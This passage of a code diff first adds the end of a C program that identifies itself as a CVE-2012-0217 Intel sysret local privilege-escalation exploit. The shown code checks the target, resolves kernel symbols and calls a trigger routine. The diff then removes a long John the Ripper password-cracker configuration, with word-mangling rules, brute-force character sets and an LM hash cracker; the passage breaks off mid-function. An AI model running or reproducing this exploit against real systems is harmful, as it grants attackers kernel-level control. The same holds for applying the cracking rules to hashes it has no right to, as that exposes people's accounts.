+   ((u_int *)cpu_vendor)[2] = regs[2];
+   cpu_vendor[12] = '\0';
+}
+
+int is_intel()
+{
+	char cpu_vendor[13];
+
+	get_cpu_vendor(cpu_vendor);
+	return !strcmp(cpu_vendor, "GenuineIntel");
+}
+
+int main(int argc, char *argv[])
+{
+	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
+
+	printf("[*] Retrieving host information...\n");
+	char cpu_vendor[13];
+	get_cpu_vendor(cpu_vendor);
+	struct utsname ver;
+	uname(&ver);
+	printf("    [+] CPU: %s\n", cpu_vendor);
+	printf("    [+] sysname: %s\n", ver.sysname);
+	printf("    [+] release: %s\n", ver.release);
+	printf("    [+] version: %s\n", ver.version);
+	printf("    [+] machine: %s\n", ver.machine);
+	printf("[*] Validating target OS and version...\n");
+	if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
+		printf("    [+] NOT Vulnerable :-(\n");
+		exit(1);
+	} else
+		printf("    [+] Vulnerable :-)\n");
+	// Prepare the values we'll need to restore the kernel to a stable state
+	printf("[*] Resolving kernel addresses...\n");
+	Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
+	Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
+	Xill_ptr = (uintptr_t)get_symaddr("Xill");
+	Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
+	Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
+	Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
+	Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
+	Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
+	Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
+	// doeet!
+	trigger();
+	return 0;
+}
+
@@ -1,2022 +0,0 @@
-#
-# This file is part of John the Ripper password cracker,
-# Copyright (c) 1996-2006,2008-2011 by Solar Designer
-#
-# ...with changes in the jumbo patch, by various authors
-#
-
-#
-# This file uses rules from the KoreLogic set published
-# online at: http://contest.korelogic.com/rules.html
-#
-
-[Options]
-# Wordlist file name, to be used in batch mode
-Wordlist = $JOHN/password.lst
-# Default Markov mode settings
-Statsfile = $JOHN/stats
-MkvLvl = 200
-MkvMaxLen = 12
-# Use idle cycles only
-Idle = Y
-# Crash recovery file saving delay in seconds
-Save = 600
-# Beep when a password is found (who needs this anyway?)
-Beep = N
-
-# Automagically disable OMP if MPI is used (set to N if
-# you want to run one MPI process per multi-core host)
-MPIOMPmutex = Y
-
-# Print a notice if disabling OMP (when MPIOMPmutex = Y)
-# or when running OMP and MPI at the same time
-MPIOMPverbose = Y
-
-# Time formatting string used in status ETA.
-# %c  means 'local' specific canonical form, such as:
-# 05/06/11 18:10:34
-#
-# Other examples
-# %d/%m/%y %H:%M   (day/mon/year hour:min)
-# %m/%d/%y %H:%M   (mon/day/year hour:min)
-# %Y-%m-%d %H:%M   (ISO 8601 style, 2011-05-06 18:10)
-TimeFormat = %c
-
-# Threshold for showing ETA, in percent. ETA will not be
-# shown if progress is less than this. If too low, early
-# reported figures will be less accurate (default 0.05%)
-ETAthreshold = 0.05%
-
-# "Single crack" mode rules
-[List.Rules:Single]
-# Simple rules come first...
-:
-s x**
-c (?a c Q
-c l Q
-s-c x** /?u l
-# These were not included in crackers I've seen, but are pretty efficient,
-# so I include them near the beginning
->6 '6
->7 '7 l
-c >6 '6 /?u l
->5 '5
-# Weird order, eh? Can't do anything about it, the order is based on the
-# number of successful cracks...
-<* d
-r c
-c <* (?a d c
-c >5 '5 /?u l
-c u Q
-c )?a r l
-[:c] <* !?A \p1[lc] p
-c <* c Q d
-c >7 '7 /?u
->4 '4 l
-c <+ (?l c r
-c <+ )?l l Tm
->3 '3
-c >4 '4 /?u
-c >3 '3 /?u l
-c u Q r
-<* d M 'l f Q
-c <* l Q d M 'l f Q
-# About 50% of single-mode-crackable passwords get cracked by now...
-# >2 x12 ... >8 x18
->[2-8] x1\1
->9 \[
-# >3 x22 ... >9 x28
->[3-9] x2\p[2-8]
-# >4 x32 ... >9 x37
->[4-9] x3\p[2-7]
-# >2 x12 /?u l ... >8 x18 /?u l
-c >[2-8] x1\1 /?u l
-c >9 \[ /?u l
-# >3 x22 /?u l ... >9 x28 /?u l
-c >[3-9] x2\p[2-8] /?u l
-# >4 x32 /?u l ... >9 x37 /?u l
-c >[4-9] x3\p[2-7] /?u l
-# Now to the suffix stuff...
-<* l $[1-9!0a-rt-z"-/:-@\[-`{-~]
-c <* (?a c $[1-9!0a-rt-z"-/:-@\[-`{-~]
-[:c] <* !?A (?\p1[za] \p1[lc] $s M 'l p Q X0z0 'l $s
-[:c] <* /?A (?\p1[za] \p1[lc] $s
-<* l r $[1-9!]
-c <* /?a u $[1-9!]
-[:c] <- (?\p1[za] \p1[lc] Az"'s"
-[:c] <- (?\p1[za] \p1[lc] Az"!!"
-[:c] (?\p1[za] \p1[lc] $! <- Az"!!"
-# Removing vowels...
-[:c] /?v @?v >2 (?\p1[za] \p1[lc]
-/?v @?v >2 <* d
-# crack -> cracked, crack -> cracking
-<* l [PI]
-c <* l [PI] (?a c
-# mary -> marie
-[:c] <* (?\p1[za] \p1[lc] )y omi $e
-# marie -> mary
-[:c] <* (?\p1[za] \p1[lc] )e \] )i val1 oay
-# The following are some 3l33t rules
-[:c] l /[aelos] s\0\p[4310$] (?\p1[za] \p1[:c]
-[:c] l /a /[elos] sa4 s\0\p[310$] (?\p1[za] \p1[:c]
-[:c] l /e /[los] se3 s\0\p[10$] (?\p1[za] \p1[:c]
-[:c] l /l /[os] sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /o /s so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /[los] sa4 se3 s\0\p[10$] (?\p1[za] \p1[:c]
-[:c] l /a /l /[os] sa4 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /a /o /s sa4 so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /e /l /[os] se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /[el] /o /s s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /l /[os] sa4 se3 sl1 s\0\p[0$] (?\p1[za] \p1[:c]
-[:c] l /a /[el] /o /s sa4 s\0\p[31] so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /e /l /o /s se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
-[:c] l /a /e /l /o /s sa4 se3 sl1 so0 ss$ (?\p1[za] \p1[:c]
-# Now to the prefix stuff...
-l ^[1a-z2-90]
-c l Q ^[A-Z]
-^[A-Z]
-l ^["-/:-@\[-`{-~]
-[:c] <9 (?a \p1[lc] A0"[tT]he"
-[:c] <9 (?a \p1[lc] A0"[aA]my"
-[:c] <9 (?a \p1[lc] A0"[mdMD]r"
-[:c] <9 (?a \p1[lc] A0"[mdMD]r."
-[:c] <9 (?a \p1[lc] A0"__"
-<- !?A l p ^[240-9]
-# Some word pair rules...
-# johnsmith -> JohnSmith, johnSmith
-p-c (?a 2 (?a c 1 [cl]
-# JohnSmith -> john smith, john_smith, john-smith
-p 1 <- $[ _\-] + l
-# JohnSmith -> John smith, John_smith, John-smith
-p-c 1 <- (?a c $[ _\-] 2 l
-# JohnSmith -> john Smith, john_Smith, john-Smith
-p-c 1 <- l $[ _\-] 2 (?a c
-# johnsmith -> John Smith, John_Smith, John-Smith
-p-c 1 <- (?a c $[ _\-] 2 (?a c
-# Applying different simple rules to each of the two words
-p-[c:] 1 \p1[ur] 2 l
-p-c 2 (?a c 1 [ur]
-p-[c:] 1 l 2 \p1[ur]
-p-c 1 (?a c 2 [ur]
-# jsmith -> smithj, etc...
-[:c] (?a \p1[lc] [{}]
-[:c] (?a \p1[lc] [{}] \0
-# Toggle case...
-c <+ )?u l Tm
-c T0 Q M c Q l Q u Q C Q X0z0 'l
-c T[1-9A-E] Q M l Tm Q C Q u Q l Q c Q X0z0 'l
-c l Q T[1-9A-E] Q M T\0 Q l Tm Q C Q u Q X0z0 'l
-c >2 <G %2?a [lu] T0 M T2 T4 T6 T8 TA TC TE Q M l Tm Q X0z0 'l
-c >2 /?l /?u t Q M c Q C Q l Tm Q X0z0 'l
-# Deleting chars...
->[2-8] D\p[1-7]
->[8-9A-E] D\1
-c /?u >[2-8] D\p[1-7] l
-c /?u >[8-9A-E] D\1 l
-=1?a \[ M c Q
-c (?a >[1-9A-E] D\1 c
-# Inserting a dot...
-[:c] >3 (?a \p1[lc] i[12].
-# More suffix stuff...
-<- l Az"[190][0-9]"
-c <- (?a c Az"[190][0-9]"
-<- l Az"[782][0-9]"
-c <- (?a c Az"[782][0-9]"
-<* l $[A-Z]
-c <* (?a c $[A-Z]
-# cracking -> CRACKiNG
-c u /I sIi
-# Crack96 -> cRACK96
-%2?a C Q
-# Crack96 -> cRACK(^
-/?A S Q
-# Crack96 -> CRaCK96
-c /?v V Q
-# Really weird charset conversions, like "england" -> "rmh;smf"
-:[RL] Q
-l Q [RL]
-c (?a c Q [RL]
-:[RL] \0 Q
-# Both prefixing and suffixing...
-<- l ^[1!@#$%^&*\-=_+.?|:'"] $\1
-<- l ^[({[<] $\p[)}\]>]
-# The rest of two-digit suffix stuff, less common numbers...
-<- l Az"[63-5][0-9]"
-c <- (?a c Az"[63-5][0-9]"
-# Some three-digit numbers...
-[:c] (?a \p1[lc] Az"007" <+
-[:c] (?a \p1[lc] Az"123" <+
-[:c] (?a \p1[lc] Az"[1-9]\0\0" <+
-# Some [birth] years...
-l Az"19[7-96-0]" <+ >-
-l Az"20[01]" <+ >-
-l Az"19[7-9][0-9]" <+
-l Az"20[01][0-9]" <+
-l Az"19[6-0][9-0]" <+
-# Uncomment the following lines if you're really crazy
-;# Insert/overstrike some characters...
-;!?A >[1-6] l i\0[a-z]
-;!?A l o0[a-z]
-;!?A >[1-7] l o\0[a-z]
-;# Toggle case everywhere (up to length 8), assuming that certain case
-;# combinations were already tried.
-;-c T1 Q M T0 Q
-;-c T2 Q M T[z0] T[z1] Q
-;-c T3 Q M T[z0] T[z1] T[z2] Q
-;-c T4 Q M T[z0] T[z1] T[z2] T[z3] Q
-;-c T5 Q M T[z0] T[z1] T[z2] T[z3] T[z4] Q
-;-c T6 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] Q
-;-c T7 Q M T[z0] T[z1] T[z2] T[z3] T[z4] T[z5] T[z6] Q
-;# Very slow stuff...
-;l Az"[1-90][0-9][0-9]" <+
-;-c (?a c Az"[1-90][0-9][0-9]" <+
-;<[\-9] l A\p[z0]"[a-z][a-z]"
-;<- l ^[a-z] $[a-z]
-
-# Wordlist mode rules
-[List.Rules:Wordlist]
-# Try words as they are
-:
-# Lowercase every pure alphanumeric word
-c >3 !?X l Q
-# Capitalize every pure alphanumeric word
-c (?a >2 !?X c Q
-# Lowercase and pluralize pure alphabetic words
-<* >2 !?A l p
-# Lowercase pure alphabetic words and append '1'
-<* >2 !?A l $1
-# Capitalize pure alphabetic words and append '1'
-c <* >2 !?A c $1
-# Duplicate reasonably short pure alphabetic words (fred -> fredfred)
-<7 >1 !?A l d
-# Lowercase and reverse pure alphabetic words
->3 !?A l M r Q
-# Prefix pure alphabetic words with '1'
->2 !?A l ^1
-# Uppercase pure alphanumeric words
-c >2 !?X u Q M c Q u
-# Lowercase pure alphabetic words and append a digit or simple punctuation
-<* >2 !?A l $[2!37954860.?]
-# Words containing punctuation, which is then squeezed out, lowercase
-/?p @?p >3 l
-# Words with vowels removed, lowercase
-/?v @?v >3 l
-# Words containing whitespace, which is then squeezed out, lowercase
-/?w @?w >3 l
-# Capitalize and duplicate short pure alphabetic words (fred -> FredFred)
-c <7 >1 !?A c d
-# Capitalize and reverse pure alphabetic words (fred -> derF)
-c <+ >2 !?A c r
-# Reverse and capitalize pure alphabetic words (fred -> Derf)
-c >2 !?A l M r Q c
-# Lowercase and reflect pure alphabetic words (fred -> fredderf)
-<7 >1 !?A l d M 'l f Q
-# Uppercase the last letter of pure alphabetic words (fred -> freD)
-c <+ >2 !?A l M r Q c r
-# Prefix pure alphabetic words with '2' or '4'
->2 !?A l ^[24]
-# Capitalize pure alphabetic words and append a digit or simple punctuation
-c <* >2 !?A c $[2!3957468.?0]
-# Prefix pure alphabetic words with digits
->2 !?A l ^[379568]
-# Capitalize and pluralize pure alphabetic words of reasonable length
-c <* >2 !?A c p
-# Lowercase/capitalize pure alphabetic words of reasonable length and convert:
-# crack -> cracked, crack -> cracking
-[:c] <* >2 !?A \p1[lc] M [PI] Q
-# Try the second half of split passwords
-s x**
-s-c x** M l Q
-
-
-# Prepend "pass"
-A0"[pP][aA][sS][sS]"
-
-
-# Case toggler for cracking MD4-based NTLM hashes (with the contributed patch)
-# given already cracked DES-based LM hashes.
-# Rename this section to [List.Rules:Wordlist] to activate it.
-[List.Rules:NT]
-:
-c T0Q
-c T1QT[z0]
-c T2QT[z0]T[z1]
-c T3QT[z0]T[z1]T[z2]
-c T4QT[z0]T[z1]T[z2]T[z3]
-c T5QT[z0]T[z1]T[z2]T[z3]T[z4]
-c T6QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]
-c T7QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]
-c T8QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]
-c T9QT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]
-c TAQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]
-c TBQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]
-c TCQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]
-c TDQT[z0]T[z1]T[z2]T[z3]T[z4]T[z5]T[z6]T[z7]T[z8]T[z9]T[zA]T[zB]T[zC]
-
-# Incremental modes
-[Incremental:All]
-File = $JOHN/all.chr
-MinLen = 0
-MaxLen = 8
-CharCount = 95
-
-
-[Incremental:All4]
-File = $JOHN/all.chr
-MinLen = 0
-MaxLen = 4
-CharCount = 95
-
-[Incremental:Alpha]
-File = $JOHN/alpha.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 26
-
-[Incremental:Digits]
-File = $JOHN/digits.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 10
-
-[Incremental:Digits5]
-File = $JOHN/digits.chr
-MinLen = 1
-MaxLen = 5
-CharCount = 10
-
-[Incremental:Alnum]
-File = $JOHN/alnum.chr
-MinLen = 1
-MaxLen = 8
-CharCount = 36
-
-[Incremental:LanMan]
-File = $JOHN/lanman.chr
-MinLen = 0
-MaxLen = 7
-CharCount = 69
-
-# Some pre-defined word filters
-[List.External:Filter_Alpha]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if (c < 'a' || c > 'z') {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_Digits]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if (c < '0' || c > '9') {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_Alnum]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
-		word = 0; return;
-	}
-}
-
-[List.External:Filter_No_Cap_or_Symbols]
-void filter()
-{
-	int i, c;
-
-	i = 0;
-	while (c = word[i++])
-	if ((c < 'a' || c > 'z') && (c < '0' || c > '9')) {
-		return;
-	}
-	word = 0; return;
-}
-
-[List.External:Filter_LanMan]
-void filter()
-{
-	int i, c;
-
-	word[7] = 0;			// Truncate at 7 characters
-
-	i = 0;				// Convert to uppercase
-	while (c = word[i]) {
-		if (c >= 'a' && c <= 'z') word[i] &= 0xDF;
-		i++;
-	}
-}
-
-# A simple cracker for LM hashes
-[List.External:LanMan]
-int length;				// Current length
-
-void init()
-{
-	word[0] = 'A' - 1;		// Start with "A"
-	word[length = 1] = 0;
-}
-
-void generate()
-{
-	int i;
-
-	i = length - 1;			// Start from the last character
-	while (++word[i] > 'Z')		// Try to increase it
-	if (i)				// Overflow here, any more positions?
-		word[i--] = 'A';	// Yes, move to the left, and repeat
-	else				// No
-	if (length < 7) {
-		word[i = ++length] = 0;	// Switch to the next length
-		while (i--)
-			word[i] = 'A';
-		return;
-	} else {
-		word = 0; return;	// We're done
-	}
-}
-
-void restore()
-{
-	length = 0;			// Calculate the length
-	while (word[length]) length++;
-}
-
-# Simple and well-commented, yet useful external mode example
-[List.External:Double]
-/*
- * This cracking mode tries all the possible duplicated lowercase alphabetic
- * "words" of up to 8 characters long.  Since word halves are the same, it
- * only has to try about 500,000 words.
- */
-
-/* Global variables: current length and word */
-int length, current[9];
-
-/* Called at startup to initialize the global variables */
-void init()
-{
-	int i;
-
-	i = length = 2;			// Start with 4 character long words
-	while (i--) current[i] = 'a';	// Set our half-word to "aa"
-}
-
-/* Generates a new word */
-void generate()
-{
-	int i;
-
-/* Export last generated word, duplicating it at the same time; here "word"
- * is a pre-defined external variable. */
-	word[(i = length) << 1] = 0;
-	while (i--) word[length + i] = word[i] = current[i];
-
-/* Generate a new word */
-	i = length - 1;			// Start from the last character
-	while (++current[i] > 'z')	// Try to increase it
-	if (i)				// Overflow here, any more positions?
-		current[i--] = 'a';	// Yes, move to the left, and repeat
-	else {				// No
-		current = 0;		// Request a length switch
-		break;			// Break out of the loop
-	}
-
-/* Switch to the next length, unless we were generating 8 character long
- * words already. */
-	if (!current && length < 4) {
-		i = ++length;
-		while (i--) current[i] = 'a';
-	}
-}
-
-/* Called when restoring an interrupted session */
-void restore()
-{
-	int i;
-
-/* Import the word back */
-	i = 0;
-	while (current[i] = word[i]) i++;
-
-/* ...and calculate the half-word length */
-	length = i >> 1;
-}
-
-# Trivial parallel processing example
-[List.External:Parallel]
-/*
- * This word filter makes John process some of the words only, for running
- * multiple instances on different CPUs.  It can be used with any cracking
- * mode except for "single crack".  Note: this is not a good solution, but
- * is just an example of what can be done with word filters.
- */
-
-int node, total;			// This node's number, and node count
-int number;				// Current word number
-
-void init()
-{
-	node = 1; total = 2;		// Node 1 of 2, change as appropriate
-	number = node - 1;		// Speedup the filter a bit
-}
-
-void filter()
-{
-	if (number++ % total)		// Word for a different node?
-		word = 0;		// Yes, skip it
-}
-
-# Strip 0.5 ("Secure Tool for Recalling Important Passwords") cracker,
-# based on analysis done by Thomas Roessler and Ian Goldberg.  This will
-# crack passwords you may have generated with Strip; other uses of Strip
-# are unaffected.
-[List.External:Strip]
-int minlength, maxlength, mintype, maxtype;
-int crack_seed, length, type;
-int count, charset[128];
-
-void init()
-{
-	int c;
-
-/* Password lengths to try; Strip can generate passwords of 4 to 16
- * characters, but traditional crypt(3) hashes are limited to 8. */
-	minlength = 4;	// 4
-	maxlength = 8;	// 16
-
-/* Password types to try (Numeric, Alpha-Num, Alpha-Num w/ Meta). */
-	mintype = 0;	// 0
-	maxtype = 2;	// 2
-
-	crack_seed = 0x10000;
-	length = minlength - 1;
-	type = mintype;
-
-	count = 0;
-	c = '0'; while (c <= '9') charset[count++] = c++;
-}
-
-void generate()
-{
-	int seed, random;
-	int i, c;
-
-	if (crack_seed > 0xffff) {
-		crack_seed = 0;
-
-		if (++length > maxlength) {
-			length = minlength;
-
-			if (++type > maxtype) {
-				word[0] = 0;
-				return;
-			}
-		}
-
-		count = 10;
-		if (type >= 1) {
-			c = 'a'; while (c <= 'f') charset[count++] = c++;
-			c = 'h'; while (c <= 'z') charset[count++] = c++;
-			c = 'A'; while (c <= 'Z') charset[count++] = c++;
-		}
-		if (type == 2) {
-			charset[count++] = '!';
-			c = '#'; while (c <= '&') charset[count++] = c++;
-			c = '('; while (c <= '/') charset[count++] = c++;
-			c = '<'; while (c <= '>') charset[count++] = c++;
-			charset[count++] = '?'; charset[count++] = '@';
-			charset[count++] = '['; charset[count++] = ']';
-			charset[count++] = '^'; charset[count++] = '_';
-			c = '{'; while (c <= '~') charset[count++] = c++;
-		}
-	}
-
-	seed = (crack_seed++ << 16 >> 16) * 22695477 + 1;
-
-	i = 0;
-	while (i < length) {
-		random = ((seed = seed * 22695477 + 1) >> 16) & 0x7fff;
-		word[i++] = charset[random % count];
-	}
-
-	word[i] = 0;
-}
-
-# Try sequences of adjacent keys on a keyboard as candidate passwords
-[List.External:Keyboard]
-int maxlength, length;	// Maximum password length to try, current length
-int fuzz;		// The desired "fuzz factor", either 0 or 1
-int id[15];		// Current character indices for each position
-int m[0x400], mc[0x80];	// The keys matrix, counts of adjacent keys
-int f[0x40], fc;	// Characters for the first position, their count
-
-void init()
-{
-	int minlength;
-	int i, j, c, p;
-	int k[0x40];
-
-	minlength = 1;	// Initial password length to try
-	maxlength = 15;	// Maximum password length to try, up to 15
-	fuzz = 1;	// "Fuzz factor", set to 0 for much quicker runs
-
-/*
- * This defines the keyboard layout, by default for a QWERTY keyboard.
- * Please note that the sizes of m[] and mc[] arrays assume 7-bit
- * characters and will need to be doubled for 8-bit characters such as
- * umlauts.
- */
-	i = 0; while (i < 0x40) k[i++] = 0;
-	k[0] = '`';
-	i = 0; while (++i <= 9) k[i] = '0' + i;
-	k[10] = '0'; k[11] = '-'; k[12] = '=';
-	k[0x11] = 'q'; k[0x12] = 'w'; k[0x13] = 'e'; k[0x14] = 'r';
-	k[0x15] = 't'; k[0x16] = 'y'; k[0x17] = 'u'; k[0x18] = 'i';
-	k[0x19] = 'o'; k[0x1a] = 'p'; k[0x1b] = '['; k[0x1c] = ']';
-	k[0x1d] = '\\';
-	k[0x21] = 'a'; k[0x22] = 's'; k[0x23] = 'd'; k[0x24] = 'f';
-	k[0x25] = 'g'; k[0x26] = 'h'; k[0x27] = 'j'; k[0x28] = 'k';
-	k[0x29] = 'l'; k[0x2a] = ';'; k[0x2b] = '\'';
-	k[0x31] = 'z'; k[0x32] = 'x'; k[0x33] = 'c'; k[0x34] = 'v';
-	k[0x35] = 'b'; k[0x36] = 'n'; k[0x37] = 'm'; k[0x38] = ',';
-	k[0x39] = '.'; k[0x3a] = '/';
-
-	i = 0; while (i < 0x80) mc[i++] = 0;
-	fc = 0;
-
-	/* rows */
-	c = 0;
-	i = 0;
-	while (i < 0x40) {
-		p = c;
-		c = k[i++];
-		if (!c) continue;
-		f[fc++] = c;
-		if (!p) continue;
-		m[(c << 3) + mc[c]++] = p;
-		m[(p << 3) + mc[p]++] = c;
-	}
-	f[fc] = 0;
-
-	/* columns */
-	i = 0;
-	while (i < 0x30) {
-		p = k[i++];
-		if (!p) continue;
-		j = 1 - fuzz;
-		while (j <= 1 + fuzz) {
-			c = k[i + 0x10 - j++];
-			if (!c) continue;
-			m[(c << 3) + mc[c]++] = p;
-			m[(p << 3) + mc[p]++] = c;
-		}
-	}
-
-	id[0] = 0;
-	length = minlength;
-}
-
-void generate()
-{
-	int i, p, maxcount;
-
-	word[i = 0] = p = f[id[0]];
-	while (++i < length)
-		word[i] = p = m[(p << 3) + id[i]];
-	word[i--] = 0;
-
-	if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	while (++id[i] >= maxcount) {
-		if (!i) {
-			if (length < maxlength) {
-				id[0] = 0;
-				id[length++] = 0;
-			}
-			return;
-		}
-		id[i--] = 0;
-		if (i) maxcount = mc[word[i - 1]]; else maxcount = fc;
-	}
-}
-
-void restore()
-{
-	int i;
-
-	/* Calculate the length */
-	length = 0;
-	while (word[length]) length++;
-
-	/* Infer the first character index */
-	i = -1;
-	while (++i < fc) {
-		if (f[i] == word[0]) {
-			id[0] = i;
-			break;
-		}
-	}
-
-	/* This sample can be enhanced to infer the rest of the indices here */
-}
-
-# Generic implementation of "dumb" exhaustive search, given a range of lengths
-# and an arbitrary charset.  This is pre-configured to try 8-bit characters
-# against LM hashes, which is only reasonable to do for very short password
-# half lengths.
-[List.External:DumbForce]
-int maxlength;		// Maximum password length to try
-int last;		// Last character position, zero-based
-int lastid;		// Character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x100], c0;	// Character set
-
-void init()
-{
-	int minlength;
-	int i, c;
-
-	minlength = 1;	// Initial password length to try, must be at least 1
-	maxlength = 7;	// Must be at least same as minlength
-
-/*
- * This defines the character set.
- *
- * Let's say, we want to try TAB, all non-control ASCII characters, and all
- * 8-bit characters, including the 8-bit terminal controls range (as these are
- * used as regular national characters with some 8-bit encodings), but except
- * for known terminal controls (risky for the terminal we may be running on).
- *
- * Also, let's say our hashes are case-insensitive, so skip lowercase letters
- * (this is right for LM hashes).
- */
-	i = 0;
-	charset[i++] = 9;		// Add horizontal TAB (ASCII 9), then
-	c = ' ';			// start with space (ASCII 32) and
-	while (c < 'a')			// proceed till lowercase 'a'
-		charset[i++] = c++;
-	c = 'z' + 1;			// Skip lowercase letters and
-	while (c <= 0x7e)		// proceed for all printable ASCII
-		charset[i++] = c++;
-	c++;				// Skip DEL (ASCII 127) and
-	while (c < 0x84)		// proceed over 8-bit codes till IND
-		charset[i++] = c++;
-	charset[i++] = 0x86;		// Skip IND (84 hex) and NEL (85 hex)
-	charset[i++] = 0x87;
-	c = 0x89;			// Skip HTS (88 hex)
-	while (c < 0x8d)		// Proceed till RI (8D hex)
-		charset[i++] = c++;
-	c = 0x91;			// Skip RI, SS2, SS3, DCS
-	while (c < 0x96)		// Proceed till SPA (96 hex)
-		charset[i++] = c++;
-	charset[i++] = 0x99;		// Skip SPA, EPA, SOS
-	c = 0xa0;			// Skip DECID, CSI, ST, OSC, PM, APC
-	while (c <= 0xff)		// Proceed with the rest of 8-bit codes
-		charset[i++] = c++;
-
-/* Zero-terminate it, and cache the first character */
-	charset[i] = 0;
-	c0 = charset[0];
-
-	last = minlength - 1;
-	i = 0;
-	while (i <= last) {
-		id[i] = 0;
-		word[i++] = c0;
-	}
-	lastid = -1;
-	word[i] = 0;
-}
-
-void generate()
-{
-	int i;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	lastid = 0;
-	word[i = last] = c0;
-	while (i--) {			// Have a preceding position?
-		if (word[i] = charset[++id[i]]) return;
-		id[i] = 0;
-		word[i] = c0;
-	}
-
-	if (++last < maxlength) {	// Next length?
-		id[last] = lastid = 0;
-		word[last] = c0;
-		word[last + 1] = 0;
-	} else				// We're done
-		word = 0;
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = 0; while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = 0;	// Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# Generic implementation of exhaustive search for a partially-known password.
-# This is pre-configured for length 8, lowercase and uppercase letters in the
-# first 4 positions (52 different characters), and digits in the remaining 4
-# positions - however, the corresponding part of init() may be modified to use
-# arbitrary character sets or even fixed characters for each position.
-[List.External:KnownForce]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length;
-	int pos, ofs, i, c;
-
-	length = 8;	// Password length to try
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < 4) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = 'a';
-		while (c <= 'z')
-			charset[ofs + i++] = c++;
-		c = 'A';
-		while (c <= 'Z')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-
-	last = length - 1;
-	pos = -1;
-	while (++pos <= last)
-		word[pos] = charset[id[pos] = pos << 8];
-	lastid = (lastofs = last << 8) - 1;
-	word[pos] = 0;
-}
-
-void generate()
-{
-	int pos;
-
-/* Handle the typical case specially */
-	if (word[last] = charset[++lastid]) return;
-
-	word[pos = last] = charset[lastid = lastofs];
-	while (pos--) {			// Have a preceding position?
-		if (word[pos] = charset[++id[pos]]) return;
-		word[pos] = charset[id[pos] = pos << 8];
-	}
-
-	word = 0;			// We're done
-}
-
-void restore()
-{
-	int i, c;
-
-/* Calculate the current length and infer the character indices */
-	last = 0;
-	while (c = word[last]) {
-		i = lastofs = last << 8;
-		while (charset[i] != c && charset[i]) i++;
-		if (!charset[i]) i = lastofs; // Not found
-		id[last++] = i;
-	}
-	lastid = id[--last];
-}
-
-# A variation of KnownForce configured to try likely date and time strings.
-[List.External:DateTime]
-int last;		// Last character position, zero-based
-int lastofs;		// Last character position offset into charset[]
-int lastid;		// Current character index in the last position
-int id[0x7f];		// Current character indices for other positions
-int charset[0x7f00];	// Character sets, 0x100 elements for each position
-
-void init()
-{
-	int length;
-	int pos, ofs, i, c;
-
-	length = 8;	// Must be one of: 4, 5, 7, 8
-
-/* This defines the character sets for different character positions */
-	pos = 0;
-	while (pos < length - 6) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	if (pos) {
-		ofs = pos++ << 8;
-		charset[ofs] = '/';
-		charset[ofs + 1] = '.';
-		charset[ofs + 2] = ':';
-		charset[ofs + 3] = 0;
-	}
-	while (pos < length - 3) {
-		ofs = pos++ << 8;
-		i = 0;
-		c = '0';
-		while (c <= '9')
-			charset[ofs + i++] = c++;
-		charset[ofs + i] = 0;
-	}
-	ofs = pos++ << 8;
-	charset[ofs] = '/';
-	charset[ofs + 1] = '.';
-	charset[ofs + 2] = ':';
-	charset[ofs + 3] = 0;
-	while (pos < length) {
-		ofs = pos++ << 8;
-		i = 0;
